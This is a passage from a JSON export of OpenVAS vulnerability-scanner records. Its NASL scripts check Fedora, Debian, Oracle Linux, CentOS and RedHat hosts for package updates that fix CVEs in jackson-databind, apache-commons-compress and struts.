author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877119\");\n script_version(\"2020-01-13T11:49:13+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-13 11:49:13 +0000 (Mon, 13 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 07:26:40 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"Fedora Update for jackson-bom FEDORA-2019-cf87377f5f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2019-cf87377f5f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQT5BNRE7LKJICVXCTQLDIGUNWFWNZM6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-bom'\n package(s) announced via the FEDORA-2019-cf87377f5f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A 'bill of materials' POM for Jackson dependencies.\");\n\n script_tag(name:\"affected\", value:\"'jackson-bom' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-bom\", rpm:\"jackson-bom~2.10.0~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-15T14:40:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-12T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-databind FEDORA-2019-b171554877", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-12384", "CVE-2019-16335"], "modified": "2019-10-15T00:00:00", "id": "OPENVAS:1361412562310876898", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876898", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876898\");\n script_version(\"2019-10-15T06:42:05+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\", \"CVE-2019-12384\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-15 06:42:05 +0000 (Tue, 15 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-12 02:30:18 +0000 (Sat, 12 Oct 2019)\");\n script_name(\"Fedora Update for jackson-databind FEDORA-2019-b171554877\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-b171554877\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4JYW4U272JPM7AYVNENNTWYYYAAQ4TZO\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-databind'\n package(s) announced via the FEDORA-2019-b171554877 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The general-purpose data-binding functionality and tree-model for Jackson Data\nProcessor. It builds on core streaming parser/generator package, and uses\nJackson Annotations for configuration.\");\n\n script_tag(name:\"affected\", value:\"'jackson-databind' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-databind\", rpm:\"jackson-databind~2.10.0~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-21T00:00:00", "type": "openvas", "title": "Fedora Update for apache-commons-compress FEDORA-2018-d29be920dc", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11771"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875213", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d29be920dc_apache-commons-compress_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for apache-commons-compress FEDORA-2018-d29be920dc\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875213\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-21 07:25:07 +0200 (Sun, 21 Oct 2018)\");\n script_cve_id(\"CVE-2018-11771\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for apache-commons-compress FEDORA-2018-d29be920dc\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-compress'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"apache-commons-compress on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d29be920dc\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPA6OSECX5L74AOD237N3C2L2BTW3MG5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-compress\", rpm:\"apache-commons-compress~1.16.1~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-29T19:25:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-22T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for jackson-databind (DLA-1798-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12086"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891798", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891798\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2019-12086\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-05-22 02:00:06 +0000 (Wed, 22 May 2019)\");\n script_name(\"Debian LTS: Security Advisory for jackson-databind (DLA-1798-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1798-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/929177\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-databind'\n package(s) announced via the DLA-1798-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A Polymorphic Typing issue was discovered in jackson-databind, a JSON\nlibrary for Java. When Default Typing is enabled (either globally or\nfor a specific property) for an externally exposed JSON endpoint, the\nservice has the mysql-connector-java jar (8.0.14 or earlier) in the\nclasspath, and an attacker can host a crafted MySQL server reachable\nby the victim, an attacker can send a crafted JSON message that allows\nthem to read arbitrary local files on the server. This occurs because of\nmissing com.mysql.cj.jdbc.admin.MiniAdmin validation.\");\n\n script_tag(name:\"affected\", value:\"'jackson-databind' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n2.4.2-2+deb8u6.\n\nWe recommend that you upgrade your jackson-databind packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libjackson2-databind-java\", ver:\"2.4.2-2+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libjackson2-databind-java-doc\", ver:\"2.4.2-2+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:36:18", "description": "Oracle Linux Local Security Checks ELSA-2014-0474", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-0474", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123417", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0474.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123417\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:31 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0474\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0474 - struts security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0474\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0474.html\");\n script_cve_id(\"CVE-2014-0114\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"struts\", rpm:\"struts~1.2.9~4jpp.8.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"struts-javadoc\", rpm:\"struts-javadoc~1.2.9~4jpp.8.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"struts-manual\", rpm:\"struts-manual~1.2.9~4jpp.8.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"struts-webapps-tomcat5\", rpm:\"struts-webapps-tomcat5~1.2.9~4jpp.8.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-23T00:00:00", "type": "openvas", "title": "Fedora Update for struts FEDORA-2014-9380", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for struts FEDORA-2014-9380\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868112\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-23 05:55:01 +0200 (Sat, 23 Aug 2014)\");\n script_cve_id(\"CVE-2014-0114\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for struts FEDORA-2014-9380\");\n script_tag(name:\"affected\", value:\"struts on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9380\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136958.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'struts'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"struts\", rpm:\"struts~1.3.10~10.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:35", "description": "Check for the Version of struts", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "CentOS Update for struts CESA-2014:0474 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:881933", "href": "http://plugins.openvas.org/nasl.php?oid=881933", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for struts CESA-2014:0474 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(881933);\n script_version(\"$Revision: 6656 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:49:38 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:12:02 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-0114\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for struts CESA-2014:0474 centos5 \");\n\n tag_insight = \"Apache Struts is a framework for building web applications\nwith Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method. A\nremote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect.\n\";\n\n tag_affected = \"struts on CentOS 5\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:0474\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-May/020284.html\");\n script_summary(\"Check for the Version of struts\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"struts\", rpm:\"struts~1.2.9~4jpp.8.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-javadoc\", rpm:\"struts-javadoc~1.2.9~4jpp.8.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-manual\", rpm:\"struts-manual~1.2.9~4jpp.8.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-webapps-tomcat5\", rpm:\"struts-webapps-tomcat5~1.2.9~4jpp.8.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:48:26", "description": "Check for the Version of struts", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "RedHat Update for struts RHSA-2014:0474-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:871164", "href": "http://plugins.openvas.org/nasl.php?oid=871164", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for struts RHSA-2014:0474-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871164);\n script_version(\"$Revision: 6688 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:49:31 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:14:04 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-0114\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for struts RHSA-2014:0474-01\");\n\n tag_insight = \"Apache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method. A\nremote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect.\n\";\n\n tag_affected = \"struts on Red Hat Enterprise Linux (v. 5 server)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2014:0474-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2014-May/msg00005.html\");\n script_summary(\"Check for the Version of struts\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"struts\", rpm:\"struts~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-debuginfo\", rpm:\"struts-debuginfo~1.2.9~4jpp.8.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"struts-javadoc\", 